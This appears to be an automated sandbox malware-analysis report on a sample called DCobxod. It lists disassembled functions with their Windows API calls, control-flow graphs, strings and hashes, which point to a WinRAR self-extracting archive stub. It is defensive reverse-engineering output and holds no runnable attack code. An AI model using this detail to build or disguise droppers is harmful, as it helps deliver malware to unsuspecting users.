                                                              • API String ID: 211097158-364855578
                                                              • Opcode ID: f935b368c9ba002b1f19cba1bc66bf95b4ca8dacc0e97d9a5be5b29e0947e936
                                                              • Instruction ID: a92c1f50a27306e4fab9d740a5b70080c2417c6747f5a4f3db80921ef297357f
                                                              • Opcode Fuzzy Hash: f935b368c9ba002b1f19cba1bc66bf95b4ca8dacc0e97d9a5be5b29e0947e936
                                                              • Instruction Fuzzy Hash: 1831B379600712AFD7109F21EC48D1BBBB9FF85B61B00052AFD05D2661EB35DC54CA6D
                                                              Function 0041A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1040 41a69b-41a6bf call 42ec50 1043 41a6c1-41a6ce FindFirstFileW 1040->1043 1044 41a727-41a730 FindNextFileW 1040->1044 1045 41a6d0-41a6e2 call 41bb03 1043->1045 1046 41a742-41a7ff call 420602 call 41c310 call 4215da * 3 1043->1046 1044->1046 1047 41a732-41a740 GetLastError 1044->1047 1055 41a6e4-41a6fc FindFirstFileW 1045->1055 1056 41a6fe-41a707 GetLastError 1045->1056 1053 41a804-41a811 1046->1053 1050 41a719-41a722 1047->1050 1050->1053 1055->1046 1055->1056 1058 41a717 1056->1058 1059 41a709-41a70c 1056->1059 1058->1050 1059->1058 1061 41a70e-41a711 1059->1061 1061->1058 1063 41a713-41a715 1061->1063 1063->1050
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0041A592,000000FF,?,?), ref: 0041A6C4
                                                                • Part of subcall function 0041BB03: _wcslen.LIBCMT ref: 0041BB27
                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0041A592,000000FF,?,?), ref: 0041A6F2
                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0041A592,000000FF,?,?), ref: 0041A6FE
                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,0041A592,000000FF,?,?), ref: 0041A728
                                                              • GetLastError.KERNEL32(?,?,?,?,0041A592,000000FF,?,?), ref: 0041A734
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                              • String ID:
                                                              • API String ID: 42610566-0
                                                              • Opcode ID: 650d0cdfdb84c598e4bc4315ea1daa7d1b8fa1a746bb832b87273f8c75b54393
                                                              • Instruction ID: acc6d26e9758d04d2b9f739a9c16823cc8148dfb1e98a07eee097232a0ed5c58
                                                              • Opcode Fuzzy Hash: 650d0cdfdb84c598e4bc4315ea1daa7d1b8fa1a746bb832b87273f8c75b54393
                                                              • Instruction Fuzzy Hash: 1E41A376501115ABC725DF64CC88AEAF3B8FB48350F10029AF569E3240D738AEE0CF94
                                                              Function 00437DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000000,?,00437DC4,00000000,0044C300,0000000C,00437F1B,00000000,00000002,00000000), ref: 00437E0F
                                                              • TerminateProcess.KERNEL32(00000000,?,00437DC4,00000000,0044C300,0000000C,00437F1B,00000000,00000002,00000000), ref: 00437E16
                                                              • ExitProcess.KERNEL32 ref: 00437E28
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 64d1974ab9b08f39d0de01bba1c105f752d1b432fcc46dec964edc90fd3cde81
                                                              • Instruction ID: f0ba565723585beee5013a0fe90ab60864e7b5fc6f440cc310a98c92d4ef7981
                                                              • Opcode Fuzzy Hash: 64d1974ab9b08f39d0de01bba1c105f752d1b432fcc46dec964edc90fd3cde81
                                                              • Instruction Fuzzy Hash: 90E04F35000144ABCF216F10DD0BA4A3F69EF19786F004465F9558A232CB39DE51CA88
                                                              Function 0041848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 608ff3c283eec5fefa1620390828d97e35c50ab2ee21493138926770a5ee2d90
                                                              • Instruction ID: d1a1e92b8f9287d3480e1e4291ff4da9a877ecd0ab5725131b819f88242ad64f
                                                              • Opcode Fuzzy Hash: 608ff3c283eec5fefa1620390828d97e35c50ab2ee21493138926770a5ee2d90
                                                              • Instruction Fuzzy Hash: 5C821B70904245AEDF15DF64C891BFBBB79AF05304F0841BFE8499B282DB385AC5CB69
                                                              Function 0042B7E0 Relevance: 109.2, APIs: 48, Strings: 14, Instructions: 731windowfilesleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0042B7E5
                                                                • Part of subcall function 00411316: GetDlgItem.USER32(00000000,00003021), ref: 0041135A
                                                                • Part of subcall function 00411316: SetWindowTextW.USER32(00000000,004435F4), ref: 00411370
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0042B8D1
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0042B8EF
                                                              • IsDialogMessageW.USER32(?,?), ref: 0042B902
                                                              • TranslateMessage.USER32(?), ref: 0042B910
                                                              • DispatchMessageW.USER32(?), ref: 0042B91A
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0042B93D
                                                              • EndDialog.USER32(?,00000001), ref: 0042B960
                                                              • GetDlgItem.USER32(?,00000068), ref: 0042B983
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0042B99E
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,004435F4), ref: 0042B9B1
                                                                • Part of subcall function 0042D453: _wcschr.LIBVCRUNTIME ref: 0042D45C
                                                                • Part of subcall function 0042D453: _wcslen.LIBCMT ref: 0042D47D
                                                              • SetFocus.USER32(00000000), ref: 0042B9B8
                                                              • _swprintf.LIBCMT ref: 0042BA24
                                                                • Part of subcall function 00414092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004140A5
                                                                • Part of subcall function 0042D4D4: GetDlgItem.USER32(00000068,0046FCB8), ref: 0042D4E8
                                                                • Part of subcall function 0042D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0042AF07,00000001,?,?,0042B7B9,0044506C,0046FCB8,0046FCB8,00001000,00000000,00000000), ref: 0042D510
                                                                • Part of subcall function 0042D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0042D51B
                                                                • Part of subcall function 0042D4D4: SendMessageW.USER32(00000000,000000C2,00000000,004435F4), ref: 0042D529
                                                                • Part of subcall function 0042D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0042D53F
                                                                • Part of subcall function 0042D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0042D559
                                                                • Part of subcall function 0042D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0042D59D
                                                                • Part of subcall function 0042D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0042D5AB
                                                                • Part of subcall function 0042D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0042D5BA
                                                                • Part of subcall function 0042D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0042D5E1
                                                                • Part of subcall function 0042D4D4: SendMessageW.USER32(00000000,000000C2,00000000,004443F4), ref: 0042D5F0
                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0042BA68
                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0042BA90
                                                              • GetTickCount.KERNEL32 ref: 0042BAAE
                                                              • _swprintf.LIBCMT ref: 0042BAC2
                                                              • GetLastError.KERNEL32(?,00000011), ref: 0042BAF4
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0042BB43
                                                              • _swprintf.LIBCMT ref: 0042BB7C
                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0042BBD0
                                                              • GetCommandLineW.KERNEL32 ref: 0042BBEA
                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0042BC47
                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 0042BC6F
                                                              • Sleep.KERNEL32(00000064), ref: 0042BCB9
                                                              • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0042BCE2
                                                              • CloseHandle.KERNEL32(00000000), ref: 0042BCEB
                                                              • _swprintf.LIBCMT ref: 0042BD1E
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0042BD7D
                                                              • SetDlgItemTextW.USER32(?,00000065,004435F4), ref: 0042BD94
                                                              • GetDlgItem.USER32(?,00000065), ref: 0042BD9D
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0042BDAC
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0042BDBB
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0042BE68
                                                              • _wcslen.LIBCMT ref: 0042BEBE
                                                              • _swprintf.LIBCMT ref: 0042BEE8
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0042BF32
                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0042BF4C
                                                              • GetDlgItem.USER32(?,00000068), ref: 0042BF55
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0042BF6B
                                                              • GetDlgItem.USER32(?,00000066), ref: 0042BF85
                                                              • SetWindowTextW.USER32(00000000,0045A472), ref: 0042BFA7
                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0042C007
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0042C01A
                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0042C0BD
                                                              • EnableWindow.USER32(00000000,00000000), ref: 0042C197
                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0042C1D9
                                                                • Part of subcall function 0042C73F: __EH_prolog.LIBCMT ref: 0042C744
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0042C1FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmap__vswprintf_c_l_wcschr
                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDGu<B$STARTDLG$^B$__tmp_rar_sfx_access_check_%u$hB$winrarsfxmappingfile.tmp$QD
                                                              • API String ID: 4093411769-2252938024
                                                              • Opcode ID: 112c9e3beab5aee5498ee1d19615b62134dc9100a96aa53735405d932f4570b6
                                                              • Instruction ID: 336c59d72ed0fced3ae041aaf9444776fa13e3bad7e60765d9611c7d9bea4ec2
                                                              • Opcode Fuzzy Hash: 112c9e3beab5aee5498ee1d19615b62134dc9100a96aa53735405d932f4570b6
                                                              • Instruction Fuzzy Hash: 6542FB70A44364BAEB219F61AC4AFBF376CEB01705F80006BF544A61D2DB7D9984CB6D
                                                              Function 00420863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316libraryfileloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 269 420863-420886 call 42ec50 GetModuleHandleW 272 4208e7-420b48 269->272 273 420888-42089f GetProcAddress 269->273 274 420c14-420c40 GetModuleFileNameW call 41c29a call 420602 272->274 275 420b4e-420b59 call 4375fb 272->275 276 4208a1-4208b7 273->276 277 4208b9-4208c9 GetProcAddress 273->277 292 420c42-420c4e call 41b146 274->292 275->274 286 420b5f-420b8d GetModuleFileNameW CreateFileW 275->286 276->277 280 4208e5 277->280 281 4208cb-4208e0 277->281 280->272 281->280 289 420c08-420c0f CloseHandle 286->289 290 420b8f-420b9b SetFilePointer 286->290 289->274 290->289 293 420b9d-420bb9 ReadFile 290->293 298 420c50-420c5b call 42081b 292->298 299 420c7d-420ca4 call 41c310 GetFileAttributesW 292->299 293->289 295 420bbb-420be0 293->295 297 420bfd-420c06 call 420371 295->297 297->289 305 420be2-420bfc call 42081b 297->305 298->299 310 420c5d-420c7b CompareStringW 298->310 307 420ca6-420caa 299->307 308 420cae 299->308 305->297 307->292 311 420cac 307->311 312 420cb0-420cb5 308->312 310->299 310->307 311->312 314 420cb7 312->314 315 420cec-420cee 312->315 316 420cb9-420ce0 call 41c310 GetFileAttributesW 314->316 317 420cf4-420d0b call 41c2e4 call 41b146 315->317 318 420dfb-420e05 315->318 324 420ce2-420ce6 316->324 325 420cea 316->325 328 420d73-420da6 call 414092 AllocConsole 317->328 329 420d0d-420d6e call 42081b * 2 call 41e617 call 414092 call 41e617 call 42a7e4 317->329 324->316 327 420ce8 324->327 325->315 327->315 334 420df3-420df5 ExitProcess 328->334 335 420da8-420ded GetCurrentProcessId AttachConsole call 433e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->335 329->334 335->334
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 0042087C
                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0042088E
                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004208BF
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00420B69
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00420B83
                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00420B93
                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,|<D,00000000), ref: 00420BB1
                                                              • CloseHandle.KERNEL32(00000000), ref: 00420C09
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00420C1E
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<D,?,00000000,?,00000800), ref: 00420C72
                                                              • GetFileAttributesW.KERNELBASE(?,?,|<D,00000800,?,00000000,?,00000800), ref: 00420C9C
                                                              • GetFileAttributesW.KERNEL32(?,?,D=D,00000800), ref: 00420CD8
                                                                • Part of subcall function 0042081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00420836
                                                                • Part of subcall function 0042081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0041F2D8,Crypt32.dll,00000000,0041F35C,?,?,0041F33E,?,?,?), ref: 00420858
                                                              • _swprintf.LIBCMT ref: 00420D4A
                                                              • _swprintf.LIBCMT ref: 00420D96
                                                                • Part of subcall function 00414092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004140A5
                                                              • AllocConsole.KERNEL32 ref: 00420D9E
                                                              • GetCurrentProcessId.KERNEL32 ref: 00420DA8
                                                              • AttachConsole.KERNEL32(00000000), ref: 00420DAF
                                                              • _wcslen.LIBCMT ref: 00420DC4
                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00420DD5
                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00420DDC
                                                              • Sleep.KERNEL32(00002710), ref: 00420DE7
                                                              • FreeConsole.KERNEL32 ref: 00420DED
                                                              • ExitProcess.KERNEL32 ref: 00420DF5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                              • String ID: (=D$,<D$,@D$0?D$0AD$4BD$8>D$D=D$DXGIDebug.dll$H?D$H@D$HAD$P>D$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=D$`@D$d?D$dAD$dwmapi.dll$h=D$h>D$kernel32$uxtheme.dll$|<D$|?D$|@D$<D$>D$?D$@D$AD
                                                              • API String ID: 1207345701-1661281665
                                                              • Opcode ID: 78f292a317e63267868c60634eb9f4ab8335585eea81046122b0759475e39766
                                                              • Instruction ID: 7a74d89ca023e829d056ff1a93ac3ebf91380116c60b8d83fec77a11177f812f
                                                              • Opcode Fuzzy Hash: 78f292a317e63267868c60634eb9f4ab8335585eea81046122b0759475e39766
                                                              • Instruction Fuzzy Hash: D6D195B1508354ABE330DF51D849B9FBAE8BF85B09F50891FF28597241C7B88648CB5E
                                                              Function 0042C73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 348 42c73f-42c757 call 42eb78 call 42ec50 353 42d40d-42d418 348->353 354 42c75d-42c787 call 42b314 348->354 354->353 357 42c78d-42c792 354->357 358 42c793-42c7a1 357->358 359 42c7a2-42c7b7 call 42af98 358->359 362 42c7b9 359->362 363 42c7bb-42c7d0 call 421fbb 362->363 366 42c7d2-42c7d6 363->366 367 42c7dd-42c7e0 363->367 366->363 368 42c7d8 366->368 369 42c7e6 367->369 370 42d3d9-42d404 call 42b314 367->370 368->370 372 42c9be-42c9c0 369->372 373 42ca5f-42ca61 369->373 374 42ca7c-42ca7e 369->374 375 42c7ed-42c7f0 369->375 370->358 381 42d40a-42d40c 370->381 372->370 379 42c9c6-42c9d2 372->379 373->370 377 42ca67-42ca77 SetWindowTextW 373->377 374->370 378 42ca84-42ca8b 374->378 375->370 380 42c7f6-42c850 call 42a64d call 41bdf3 call 41a544 call 41a67e call 416edb 375->380 377->370 378->370 382 42ca91-42caaa 378->382 383 42c9e6-42c9eb 379->383 384 42c9d4-42c9e5 call 437686 379->384 434 42c98f-42c9a4 call 41a5d1 380->434 381->353 386 42cab2-42cac0 call 433e13 382->386 387 42caac 382->387 390 42c9f5-42ca00 call 42b48e 383->390 391 42c9ed-42c9f3 383->391 384->383 386->370 404 42cac6-42cacf 386->404 387->386 395 42ca05-42ca07 390->395 391->395 397 42ca12-42ca32 call 433e13 call 433e3e 395->397 398 42ca09-42ca10 call 433e13 395->398 423 42ca34-42ca3b 397->423 424 42ca4b-42ca4d 397->424 398->397 408 42cad1-42cad5 404->408 409 42caf8-42cafb 404->409 412 42cb01-42cb04 408->412 414 42cad7-42cadf 408->414 411 42cbe0-42cbee call 420602 409->411 409->412 432 42cbf0-42cc04 call 43279b 411->432 416 42cb11-42cb2c 412->416 417 42cb06-42cb0b 412->417 414->370 420 42cae5-42caf3 call 420602 414->420 435 42cb76-42cb7d 416->435 436 42cb2e-42cb68 416->436 417->411 417->416 420->432 429 42ca42-42ca4a call 437686 423->429 430 42ca3d-42ca3f 423->430 424->370 431 42ca53-42ca5a call 433e2e 424->431 429->424 430->429 431->370 447 42cc11-42cc62 call 420602 call 42b1be GetDlgItem SetWindowTextW SendMessageW call 433e49 432->447 448 42cc06-42cc0a 432->448 453 42c855-42c869 SetFileAttributesW 434->453 454 42c9aa-42c9b9 call 41a55a 434->454 444 42cbab-42cbce call 433e13 * 2 435->444 445 42cb7f-42cb97 call 433e13 435->445 471 42cb6a 436->471 472 42cb6c-42cb6e 436->472 444->432 476 42cbd0-42cbde call 4205da 444->476 445->444 458 42cb99-42cba6 call 4205da 445->458 482 42cc67-42cc6b 447->482 448->447 455 42cc0c-42cc0e 448->455 459 42c90f-42c91f GetFileAttributesW 453->459 460 42c86f-42c8a2 call 41b991 call 41b690 call 433e13 453->460 454->370 455->447 458->444 459->434 469 42c921-42c930 DeleteFileW 459->469 491 42c8a4-42c8b3 call 433e13 460->491 492 42c8b5-42c8c3 call 41bdb4 460->492 469->434 475 42c932-42c935 469->475 471->472 472->435 479 42c939-42c965 call 414092 GetFileAttributesW 475->479 476->432 489 42c937-42c938 479->489 490 42c967-42c97d MoveFileW 479->490 482->370 486 42cc71-42cc85 SendMessageW 482->486 486->370 489->479 490->434 493 42c97f-42c989 MoveFileExW 490->493 491->492 498 42c8c9-42c908 call 433e13 call 42fff0 491->498 492->454 492->498 493->434 498->459
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0042C744
                                                                • Part of subcall function 0042B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0042B3FB
                                                                • Part of subcall function 0042AF98: _wcschr.LIBVCRUNTIME ref: 0042B033
                                                              • _wcslen.LIBCMT ref: 0042CA0A
                                                              • _wcslen.LIBCMT ref: 0042CA13
                                                              • SetWindowTextW.USER32(?,?), ref: 0042CA71
                                                              • _wcslen.LIBCMT ref: 0042CAB3
                                                              • _wcsrchr.LIBVCRUNTIME ref: 0042CBFB
                                                              • GetDlgItem.USER32(?,00000066), ref: 0042CC36
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0042CC46
                                                              • SendMessageW.USER32(00000000,00000143,00000000,0045A472), ref: 0042CC54
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0042CC7F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                              • String ID: %s.%d.tmp$<br>$<B$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$B
                                                              • API String ID: 986293930-4084395682
                                                              • Opcode ID: 9e2a188804dccbc4fa8751d8063872bbc83f8161d6a8d2514a106e5ef9e5232d
                                                              • Instruction ID: 8d41bd92862dd9a9a1dd70fa8f8daed738802c07fa2998ef2259d158826b6c39
                                                              • Opcode Fuzzy Hash: 9e2a188804dccbc4fa8751d8063872bbc83f8161d6a8d2514a106e5ef9e5232d
                                                              • Instruction Fuzzy Hash: 56E16972A00128AADF24DB61ED85EEF73BCAB05350F5041A7F545E3140EB789F848F69
                                                              Function 0041DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0041DA70
                                                              • _wcschr.LIBVCRUNTIME ref: 0041DA91
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0041DAAC
                                                                • Part of subcall function 0041C29A: _wcslen.LIBCMT ref: 0041C2A2
                                                                • Part of subcall function 004205DA: _wcslen.LIBCMT ref: 004205E0
                                                                • Part of subcall function 00421B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0041BAE9,00000000,?,?,?,0001041E), ref: 00421BA0
                                                              • _wcslen.LIBCMT ref: 0041DDE9
                                                              • __fprintf_l.LIBCMT ref: 0041DF1C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9D
                                                              • API String ID: 557298264-3442010527
                                                              • Opcode ID: 615fca7a5ec14a9533691910958e3f80033d41b3660e22b8e20150971c6f06fa
                                                              • Instruction ID: 1b91c1c65f857c0fda28986259004d2bfa804cb07db239eed686d78a8d6cddc5
                                                              • Opcode Fuzzy Hash: 615fca7a5ec14a9533691910958e3f80033d41b3660e22b8e20150971c6f06fa
